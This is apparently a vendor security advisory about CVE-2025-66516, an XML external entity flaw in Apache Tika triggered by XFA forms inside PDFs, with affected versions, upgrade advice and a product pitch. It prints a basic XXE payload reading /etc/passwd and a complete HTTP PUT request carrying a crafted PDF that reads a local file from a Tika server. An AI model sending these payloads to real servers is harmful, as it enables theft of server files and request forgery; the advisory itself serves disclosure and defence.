Apache Tika XXE Vulnerability CVE-2025-66516 Explained

Picus Labs | 6 MIN READ

CREATED ON January 09, 2026

A high-severity security flaw has been identified in Apache Tika, the open-source framework widely utilized for document parsing and metadata extraction. Tracked as CVE-2025-66516 with a CVSS score of 8.4, this vulnerability enables XML External Entity (XXE) attacks via malicious XFA files embedded within PDFs. 

This disclosure supersedes the previously reported CVE-2025-54988; investigation revealed that the root cause resides within the tika-core library rather than the PDF module alone, effectively expanding the scope of affected packages. Because the vulnerability exists in the core logic, upgrading only the PDF parser module is insufficient to resolve the issue.

Systems processing untrusted files are susceptible to significant risks, including the exfiltration of sensitive local files, server-side request forgery (SSRF), and denial of service (DoS). To remediate this threat, it is essential to upgrade tika-core to version 3.2.2 or later, as earlier versions (1.13 through 3.2.1) remain vulnerable to exploitation.

What Is the Apache Tika?

Apache Tika is an open-source framework designed to detect and extract metadata and text from a vast array of file formats. It is capable of processing over a thousand different file types, including common formats like PowerPoint (PPT), Excel (XLS), and Portable Document Format (PDF). Because of its versatility, Tika has become a fundamental component in document processing workflows, content analysis systems, and search indexing engines across various sectors, including finance, media, legal, and government.

What Is the XXE (XML External Entity) Injection Attack?

An XML External Entity (XXE) attack targets applications that parse XML input. This vulnerability arises when an XML parser is weakly configured and processes input containing a reference to an external entity. The XML 1.0 standard defines "entities" as storage units, which can be external (storage outside the document). These external entities are accessed via a declared system identifier, typically a URI, which the processor attempts to dereference.

If an attacker includes tainted data in the system identifier and the XML processor dereferences it, the system may disclose confidential information that the application should not expose. Beyond data disclosure, successful XXE attacks can lead to Denial of Service (DoS), Server-Side Request Forgery (SSRF), and port scanning from the perspective of the server. In scenarios where the parser has client-side memory corruption flaws, dereferencing a malicious URI could even result in arbitrary code execution.

Below is a simple example payload of an XXE vulnerability, which discloses the /etc/passwd file of the target server [1]:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>

How Does the CVE-2025-66516 Exploit Work?

CVE-2025-66516 is a high-severity vulnerability that has been identified in Apache Tika. This flaw carries a CVSS score of 8.4 and enables attackers to execute XML External Entity (XXE) attacks by embedding a maliciously crafted XFA file inside a PDF [2]. If processed by a vulnerable version of Tika, this can lead to unauthorized information disclosure or denial of service.

Below is shown a generic example of the XXE payload to exploit this vulnerability:

PUT /<Tika Endpoint> HTTP/1.1
Content-Type: application/pdf
Content-Length: 1410

%PDF-1.7
%âãÏÓ
1 0 obj
<< /Type /Catalog /Pages 2 0 R /AcroForm 5 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 4 0 R >>
endobj
4 0 obj
<< /Length 0 >>
stream
endstream
endobj
5 0 obj
<< /Fields [] /XFA 6 0 R /NeedAppearances true >>
endobj
6 0 obj
<< /Length 758 >>
stream
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xdp:xdp [
  <!ENTITY xxe SYSTEM "file:///path/to/the/file">
]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/" xml:lang="en">
<config xmlns="http://www.xfa.org/schema/xci/3.1/">
  <present><pdf><version>1.7</version></pdf></present>
</config>
<template xmlns="http://www.xfa.org/schema/xfa-template/3.3/">
  <subform name="form1" layout="tb">
    <pageSet><pageArea><contentArea/><medium stock="letter"/></pageArea></pageSet>
    <subform>
      <field name="data"><ui><textEdit/></ui><value><text>&xxe;</text></value></field>
    </subform>
  </subform>
</template>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
  <xfa:data><form1><data>&xxe;</data></form1></xfa:data>
</xfa:datasets>
</xdp:xdp>
endstream
endobj
xref
0 7
0000000000 65535 f
0000000015 00000 n
0000000080 00000 n
0000000137 00000 n
0000000224 00000 n
0000000272 00000 n
0000000337 00000 n
trailer
<< /Size 7 /Root 1 0 R >>
startxref
1146
%%EOF

After the attacker sends this request, the Apache Tika server receives the PDF and initiates the parsing process. It identifies the embedded XFA form data and passes the XML stream to the underlying parser.

Because the XML parser processes the malicious <!DOCTYPE> declaration. The parser executes the instruction to resolve the system entity &xxe;, reading the contents of the targeted local file (e.g., /etc/passwd) directly from the server's filesystem.

The sensitive file content is then substituted into the XML structure wherever the entity is referenced.

What Is the Remediation for CVE-2025-66516?

The following modules and version ranges are affected on all platforms [3]:

  • Apache Tika core (org.apache.tika:tika-core) 1.13 through 3.2.1
  • Apache Tika parsers (org.apache.tika:tika-parsers) 1.13 before 2.0.0
  • Apache Tika PDF parser module (org.apache.tika:tika-parser-pdf-module) 2.0.0 through 3.2.1

To fully mitigate this issue, you must ensure that tika-core is also upgraded to version 3.2.2 or higher. Upgrading the tika-parser-pdf-module alone is insufficient.

How Picus Helps Simulate Apache Tika CVE-2025-66516 Attacks?

We also strongly suggest simulating the Apache Tika CVE-2025-66516 vulnerability to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus Security Validation Platform. You can also test your defenses against other vulnerability exploitation attacks, such as regreSSHion, Citrix Bleed, and Follina, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Apache Tika CVE-2025-66516 vulnerability exploitation attacks:

Threat ID

Threat Name

Attack Module

74403

Apache Tika Web Attack Campaign

Web Application

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

Key Takeaways

  • CVE-2025-66516 is a high-severity vulnerability in the Apache Tika framework with a CVSS score of 8.4 that enables XML External Entity (XXE) attacks via malicious XFA files embedded within PDFs.
  • The root cause of this flaw resides within the tika-core library rather than the PDF module alone, meaning that upgrading only the PDF parser module is insufficient to resolve the issue.
  • Exploitation occurs when the XML parser processes a malicious !DOCTYPE declaration within an embedded XFA form, causing the system to resolve external entities and potentially disclose sensitive local files like /etc/passwd.
  • Successful attacks can lead to severe consequences for systems processing untrusted files, including the exfiltration of sensitive data, Server-Side Request Forgery (SSRF), and Denial of Service (DoS).
  • To fully remediate the threat, organizations must upgrade tika-core to version 3.2.2 or later, as versions 1.13 through 3.2.1 remain vulnerable on all platforms.
  • The Picus Security Validation Platform allows organizations to simulate Apache Tika CVE-2025-66516 attacks using Threat ID 74403 to validate security controls against this specific vulnerability.

References

[1] “XML External Entity (XXE) Processing.” Accessed: Jan. 07, 2026. [Online]. Available: https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing

[2] “CVE-2025-66516” Accessed: Jan. 07, 2026. [Online]. Available: https://www.cve.org/CVERecord?id=CVE-2025-66516

[3] “CVE-2025-66516: Apache Tika core, Apache Tika parsers, Apache Tika PDF parser module: Update to CVE-2025-54988 to expand scope of artifacts affected” Accessed: Jan. 07, 2026. [Online]. Available: https://lists.apache.org/thread/s5x3k93nhbkqzztp1olxotoyjpdlps9k

 
CVE-2025-66516 is a high-severity security flaw with a CVSS score of 8.4. This vulnerability permits attackers to execute XML External Entity (XXE) attacks by embedding malicious XFA files within PDFs. It enables the exfiltration of sensitive local files, Server-Side Request Forgery (SSRF), and potential Denial of Service (DoS) attacks on systems processing untrusted files.
The vulnerability affects Apache Tika core (org.apache.tika:tika-core) versions 1.13 through 3.2.1. It also impacts Apache Tika parsers (org.apache.tika:tika-parsers) versions 1.13 before 2.0.0 and the Apache Tika PDF parser module (org.apache.tika:tika-parser-pdf-module) versions 2.0.0 through 3.2.1.
To remediate this threat, you must upgrade the tika-core library to version 3.2.2 or later. Upgrading only the PDF parser module is insufficient because the root cause exists within the core logic of the framework. Ensure all affected packages, including parsers and specific modules, are updated to versions that supersede the vulnerable ranges.
An attacker exploits this flaw by sending a PDF containing a maliciously crafted XFA file to a vulnerable Tika server. The embedded XFA data contains an XML payload with a reference to an external entity. When the Tika parser processes the file, it resolves the system entity, reading targeted local files like /etc/passwd and substituting the content into the XML structure, thereby disclosing sensitive data.
This analysis supersedes the previously reported CVE-2025-54988 because further investigation revealed the root cause lies within the tika-core library rather than just the PDF module. This discovery effectively expanded the scope of affected packages. Consequently, simply updating the PDF module does not fully resolve the security risk, necessitating a core library upgrade.
The Picus Security Validation Platform allows you to simulate the Apache Tika CVE-2025-66516 vulnerability to test the effectiveness of your security controls. The Picus Threat Library includes specific threats, such as the Apache Tika Web Attack Campaign (Threat ID 74403), enabling the validation of defenses against sophisticated cyber attacks and other vulnerability exploitations.

Table of Contents

Ready to start? Request a demo